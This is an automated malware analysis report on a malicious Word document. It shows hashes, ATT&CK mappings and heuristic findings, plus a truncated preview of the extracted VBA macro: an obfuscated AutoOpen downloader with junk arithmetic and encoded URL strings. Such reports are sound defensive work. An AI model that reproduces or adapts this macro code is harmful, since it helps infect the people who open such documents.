Office (OLE) malware analysis — malicious · 619af6c8d64fe26c

MALICIOUS

Office (OLE)

250.5 KB Created: 2018-01-31 11:24:00 Authoring application: Microsoft Office Word First seen: 2018-02-07

MD5: 531b302092c0d33f16deae5fa889fcb6 SHA-1: 34836af056be668765ba1ae09830a3a40c676bbf SHA-256: 619af6c8d64fe26c57fa2251174bb9840e1681344ef0a4b614e01d7a99c7be8a

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function and Application.Run to execute arbitrary code, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its role as a dropper for malicious content.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 92035 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	92035 bytes
SHA-256: `eb3989a6dad51ec3b4b59872480eda9062f8f6c2df8bd6bc517436bd93af1295`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "cqTXrplDpUnSQG" Sub AutoOpen() On Error Resume Next WKDljpcBl = 7816985 + RNfTuOVbVHFJC - OPIb2 / Log(zfuDiCVUKlwHw / Int(jqViUYAAlv) - 8104359 * XbMmQAAt) / Qnf + Hex(JhwHmTzCtWmQ) / (rflWpirwuwNRft - Int(XUwHFqZI) - 4555556 * ChrW(5357988 / EDwrYDwZkhAu + WBiPjkpH - CByte(5082021 + CLng(7925998 + ChrW(5945869) - 4939642 - Chr(fLGRWNuHZoA))))) CaJVFJbWZ = 7293911 + DIKZmmaiNTRw - OPIb2 / Log(lSSKnzDzNi / Int(JbTBROHzo) - 9000053 * wHwbIhua) / Qnf + Hex(kblkmqQjainq) / (zQLTYNzLSKd - Int(ULOMrWCmAch) - 7951842 * ChrW(6658578 / azYZFHRYK + PoIhaWSQIHS - CByte(6055211 + CLng(429333 + ChrW(4582822) - 6771654 - Chr(lDZUiWkJ))))) mCmsFVLvA = 6571682 + CNUMiJRjbzvvAp - OPIb2 / Log(WOzpzsDzvYjZL / Int(vWiUbjzQrvLR) - 7979061 * LrGmCNzz) / Qnf + Hex(LlDzOZnvkFufbQ) / (ZJtFWEifDtn - Int(RwWwmwZ) - 3783709 * ChrW(6731380 / hlqDzaMvik + fNtTuasjFAF - CByte(5057046 + CLng(4083270 + ChrW(4314608) - 9715738 - Chr(HHjBwsBcI))))) OTEDTIPDd = 7250666 + disYjndXbKVh - OPIb2 / Log(NEnzidn / Int(QLfGocmr) - 8012111 * rkPkdPIVJP) / Qnf + Hex(AztmCqOVRVz) / (XMSNRsKqfmoiwl - Int(bXpNUYhQOmU) - 7218542 * ChrW(7475196 / WXArmsXLCq + zYzOJOpQMnz - CByte(5453114 + CLng(1662497 + ChrW(6079507) - 5047713 - Chr(vDawGXSIOnmKt))))) Application.Run "jjjEtqsJazK", YczZoHEbXZT FQVzkUziC = 1078916 + fUalZvsMMC - OPIb2 / Log(HbtVcGqzVcf / Int(GWbdYKaHtw) - 694645 * mzhjTvZwr) / Qnf + Hex(IuFOssrCkuz) / (TOzSTBluiJXbjf - Int(HjaChfdNjX) - 1933628 * ChrW(3545148 / QrNJSodSlBbY + zvzXdiNT - CByte(7050170 + CLng(4140646 + ChrW(1923736) - 8392721 - Chr(RqAQuJiDi))))) qvOJuBGVf = 9703697 + UihOJufFOfV - OPIb2 / Log(RAXnSUG / Int(pJTFEIUjM) - 2442886 * pLNzjImGz) / Qnf + Hex(dpwUrzIXNoA) / (joLOcKBZvt - Int(QjsEDni) - 6162107 * ChrW(2728294 / nLUUkMLL + wYOQfYlU - CByte(6247354 + CLng(5412706 + ChrW(1017306) - 5039000 - Chr(kniozsFkjImS))))) scrurzqNj = 9030184 + BPNfSSwDIjE - OPIb2 / Log(jmvNSGbOPcw / Int(vuaoiPMzpKhZ) - 7258915 * nSlEdlnCK) / Qnf + Hex(wjXHIjNY) / (bjXrJZtUF - Int(WFWbFTJdLzNw) - 8753852 * ChrW(6772872 / svrErJwII + dPabfjQh - CByte(3302473 + CLng(7755890 + ChrW(522002) - 4912621 - Chr(SnwCCZCc))))) qoYRdBPOb = 5053734 + NRbEiBfPwQcuQS - OPIb2 / Log(ZRsGtjFhnaCKB / Int(BTpOGLqqjQBX) - 1771727 * MOtIwqc) / Qnf + Hex(WUjMHjoijrdivz) / (jJHwiibFWazV - Int(juLLFDwVht) - 732180 * ChrW(1352432 / FkJtbLP + MwrttPvPKmI - CByte(2685225 + CLng(3029811 + ChrW(9513773) - 7283497 - Chr(ScrARzQDpjd))))) End Sub Function YczZoHEbXZT() On Error Resume Next wOwisQ = ("FjG%143Q164m56v156E154v57d165Q151m144E107B114E64d123d167-77-150-164Q164-160E72%57v57v154%157O167O143B157O163E164B167v14whJPAFZj") WukPKTFmkU = 6339009 + MwzfBHkiPQ - OPIb2 / Log(naNwLBLpdPkOhO / Int(NiKWqHaVzSNYD) - 6288725 * EFrhqPLrCYPYDK) / Qnf + Hex(kSRIuGUsZqM) / (OjwdIIi - Int(iXzXdBmH) - 9586109 * ChrW(5257498 / XLWhvGumpkNR + iJzKEuGPVzzNS - CByte(8854122 + CLng(5811045 + ChrW(8622642) - 3748868 - Chr(uwHpurwD))))) pRDRfRzjPaK = 4480842 + WtaRGJtUD - OPIb2 / Log(DCUTBLZUcMQ / Int(VYSSipPGMAXstc) - 4775266 * HJAJprIrdon) / Qnf + Hex(RdaKzcXCznaE) / (zPCfbaZ - Int(uNTLGEdPaouBj) - 7831072 * ChrW(6653479 / MvQFWfTjwEr + GMCNOvXQHzq - CByte(4613731 + CLng(8789466 + ChrW(7509042) - 4879681 - Chr(fCYIjcSjJUQOtk))))) NwzAzPlnJS = Mid(wOwisQ, 4, 116) HbLRRYNL = ("BzY2NoXFo3M0U164%164%160Q72m57%57U162E141%143Q145m146%151FKzbsanAcc8sEw6bkMiJEw") TrfiCO = 9847849 + HCOiILIPGOmF - OPIb2 / Log(WpjPYozNnNaiPY / Int(UIMKjIUJzsi) - 3501687 * JEQiiLmQOpp) / Qnf + Hex(CTTpoAsm) / (vwBbVnCfjXq - Int(UEizrzDmNF) - 3517178 * ChrW(4335514 / hpAULrpfzOFOHN + kliSzoiPkr - CByte(9501136 + CLng(241700 + ChrW(7880126) - 9982276 - Chr(pjfbnzBKY))))) tJUQLj = 6043762 + qUpdjjm - OPIb2 / Log(CcazXLzaPdN / Int(AfjYZjfZaiaGn) - 9708835 * NZHINPJznPjIQo) / Qnf + Hex(mhKoAKlQEz) / (MEUCUMY - Int(mBIUA ... (truncated)

SHA-256: eb3989a6dad51ec3b4b59872480eda9062f8f6c2df8bd6bc517436bd93af1295

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cqTXrplDpUnSQG"
Sub AutoOpen()
On Error Resume Next
WKDljpcBl = 7816985 + RNfTuOVbVHFJC - OPIb2 / Log(zfuDiCVUKlwHw / Int(jqViUYAAlv) - 8104359 * XbMmQAAt) / Qnf + Hex(JhwHmTzCtWmQ) / (rflWpirwuwNRft - Int(XUwHFqZI) - 4555556 * ChrW(5357988 / EDwrYDwZkhAu + WBiPjkpH - CByte(5082021 + CLng(7925998 + ChrW(5945869) - 4939642 - Chr(fLGRWNuHZoA)))))
CaJVFJbWZ = 7293911 + DIKZmmaiNTRw - OPIb2 / Log(lSSKnzDzNi / Int(JbTBROHzo) - 9000053 * wHwbIhua) / Qnf + Hex(kblkmqQjainq) / (zQLTYNzLSKd - Int(ULOMrWCmAch) - 7951842 * ChrW(6658578 / azYZFHRYK + PoIhaWSQIHS - CByte(6055211 + CLng(429333 + ChrW(4582822) - 6771654 - Chr(lDZUiWkJ)))))
mCmsFVLvA = 6571682 + CNUMiJRjbzvvAp - OPIb2 / Log(WOzpzsDzvYjZL / Int(vWiUbjzQrvLR) - 7979061 * LrGmCNzz) / Qnf + Hex(LlDzOZnvkFufbQ) / (ZJtFWEifDtn - Int(RwWwmwZ) - 3783709 * ChrW(6731380 / hlqDzaMvik + fNtTuasjFAF - CByte(5057046 + CLng(4083270 + ChrW(4314608) - 9715738 - Chr(HHjBwsBcI)))))
OTEDTIPDd = 7250666 + disYjndXbKVh - OPIb2 / Log(NEnzidn / Int(QLfGocmr) - 8012111 * rkPkdPIVJP) / Qnf + Hex(AztmCqOVRVz) / (XMSNRsKqfmoiwl - Int(bXpNUYhQOmU) - 7218542 * ChrW(7475196 / WXArmsXLCq + zYzOJOpQMnz - CByte(5453114 + CLng(1662497 + ChrW(6079507) - 5047713 - Chr(vDawGXSIOnmKt)))))
Application.Run "jjjEtqsJazK", YczZoHEbXZT
FQVzkUziC = 1078916 + fUalZvsMMC - OPIb2 / Log(HbtVcGqzVcf / Int(GWbdYKaHtw) - 694645 * mzhjTvZwr) / Qnf + Hex(IuFOssrCkuz) / (TOzSTBluiJXbjf - Int(HjaChfdNjX) - 1933628 * ChrW(3545148 / QrNJSodSlBbY + zvzXdiNT - CByte(7050170 + CLng(4140646 + ChrW(1923736) - 8392721 - Chr(RqAQuJiDi)))))
qvOJuBGVf = 9703697 + UihOJufFOfV - OPIb2 / Log(RAXnSUG / Int(pJTFEIUjM) - 2442886 * pLNzjImGz) / Qnf + Hex(dpwUrzIXNoA) / (joLOcKBZvt - Int(QjsEDni) - 6162107 * ChrW(2728294 / nLUUkMLL + wYOQfYlU - CByte(6247354 + CLng(5412706 + ChrW(1017306) - 5039000 - Chr(kniozsFkjImS)))))
scrurzqNj = 9030184 + BPNfSSwDIjE - OPIb2 / Log(jmvNSGbOPcw / Int(vuaoiPMzpKhZ) - 7258915 * nSlEdlnCK) / Qnf + Hex(wjXHIjNY) / (bjXrJZtUF - Int(WFWbFTJdLzNw) - 8753852 * ChrW(6772872 / svrErJwII + dPabfjQh - CByte(3302473 + CLng(7755890 + ChrW(522002) - 4912621 - Chr(SnwCCZCc)))))
qoYRdBPOb = 5053734 + NRbEiBfPwQcuQS - OPIb2 / Log(ZRsGtjFhnaCKB / Int(BTpOGLqqjQBX) - 1771727 * MOtIwqc) / Qnf + Hex(WUjMHjoijrdivz) / (jJHwiibFWazV - Int(juLLFDwVht) - 732180 * ChrW(1352432 / FkJtbLP + MwrttPvPKmI - CByte(2685225 + CLng(3029811 + ChrW(9513773) - 7283497 - Chr(ScrARzQDpjd)))))
End Sub
Function YczZoHEbXZT()
On Error Resume Next
wOwisQ = ("FjG%143Q164m56v156E154v57d165Q151m144E107B114E64d123d167-77-150-164Q164-160E72%57v57v154%157O167O143B157O163E164B167v14whJPAFZj")
WukPKTFmkU = 6339009 + MwzfBHkiPQ - OPIb2 / Log(naNwLBLpdPkOhO / Int(NiKWqHaVzSNYD) - 6288725 * EFrhqPLrCYPYDK) / Qnf + Hex(kSRIuGUsZqM) / (OjwdIIi - Int(iXzXdBmH) - 9586109 * ChrW(5257498 / XLWhvGumpkNR + iJzKEuGPVzzNS - CByte(8854122 + CLng(5811045 + ChrW(8622642) - 3748868 - Chr(uwHpurwD)))))
pRDRfRzjPaK = 4480842 + WtaRGJtUD - OPIb2 / Log(DCUTBLZUcMQ / Int(VYSSipPGMAXstc) - 4775266 * HJAJprIrdon) / Qnf + Hex(RdaKzcXCznaE) / (zPCfbaZ - Int(uNTLGEdPaouBj) - 7831072 * ChrW(6653479 / MvQFWfTjwEr + GMCNOvXQHzq - CByte(4613731 + CLng(8789466 + ChrW(7509042) - 4879681 - Chr(fCYIjcSjJUQOtk)))))
NwzAzPlnJS = Mid(wOwisQ, 4, 116)
HbLRRYNL = ("BzY2NoXFo3M0U164%164%160Q72m57%57U162E141%143Q145m146%151FKzbsanAcc8sEw6bkMiJEw")
TrfiCO = 9847849 + HCOiILIPGOmF - OPIb2 / Log(WpjPYozNnNaiPY / Int(UIMKjIUJzsi) - 3501687 * JEQiiLmQOpp) / Qnf + Hex(CTTpoAsm) / (vwBbVnCfjXq - Int(UEizrzDmNF) - 3517178 * ChrW(4335514 / hpAULrpfzOFOHN + kliSzoiPkr - CByte(9501136 + CLng(241700 + ChrW(7880126) - 9982276 - Chr(pjfbnzBKY)))))
tJUQLj = 6043762 + qUpdjjm - OPIb2 / Log(CcazXLzaPdN / Int(AfjYZjfZaiaGn) - 9708835 * NZHINPJznPjIQo) / Qnf + Hex(mhKoAKlQEz) / (MEUCUMY - Int(mBIUA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.